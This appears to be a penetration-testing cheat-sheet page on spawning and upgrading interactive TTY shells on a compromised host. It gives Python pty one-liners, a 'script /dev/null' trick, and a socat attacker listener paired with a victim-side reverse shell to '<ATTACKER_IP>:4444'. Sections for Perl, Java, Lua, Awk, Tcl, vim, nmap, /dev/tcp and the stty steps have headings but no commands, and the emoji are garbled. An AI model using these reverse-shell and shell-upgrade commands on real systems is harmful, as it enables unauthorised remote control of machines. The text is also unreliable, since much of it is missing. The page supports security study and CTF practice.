Spawn TTY Shells

๐Ÿ”ง Python Methods

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

You can also use:

python -c 'import os; os.system("/bin/bash")'

๐Ÿ Socat Methods (from attacker and victim)

On attacker (listener):

socat file:`tty`,raw,echo=0 tcp-listen:4444

On victim (reverse shell):

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<ATTACKER_IP>:4444

๐Ÿฆ€ Script Method (if available on the system)

script /dev/null -c bash

๐Ÿง  Regaining Full Terminal Control

  1. Suspend with Ctrl + Z

  2. On the attacker host:

๐Ÿ“ฆ Ensuring Terminal Configuration

๐Ÿ–ผ Adjusting Window Size (prevents errors when using programs like nano, htop, etc.)

  1. On the attacker host:

  1. On the remote shell:

๐Ÿ“Ÿ /dev/tcp and Bash Method (interactive reverse shell)

Once connected, you can upgrade the shell with stty (explained below).

๐Ÿš Shell Upgrade with System Commands (stty and export)

Once you use any of the above methods (like python -c 'pty.spawn(...)'), you can further improve it with:

Then, type:

๐Ÿงฌ With Perl

Or with pseudo-terminal:

โ˜• With Java

If Runtime.exec() is accessible:

(Generally not very useful manually, but useful in Java app exploitation).

๐Ÿฆฅ With Lua

๐Ÿงฑ With Awk

๐Ÿงช With Tcl

๐Ÿงžโ€โ™‚๏ธ With vi or vim (command mode)

Or:

๐Ÿ–‹๏ธ With nmap (if it has scripting with --interactive)

๐Ÿ’พ With Docker / Chroot / chsh if you have permissions

Or if you can change your shell:

๐Ÿง  Useful Tips

If you have a shell without colors or history, export:

To check if a TTY is assigned:

PreviousPassword AttacksNextCTFs

Last updated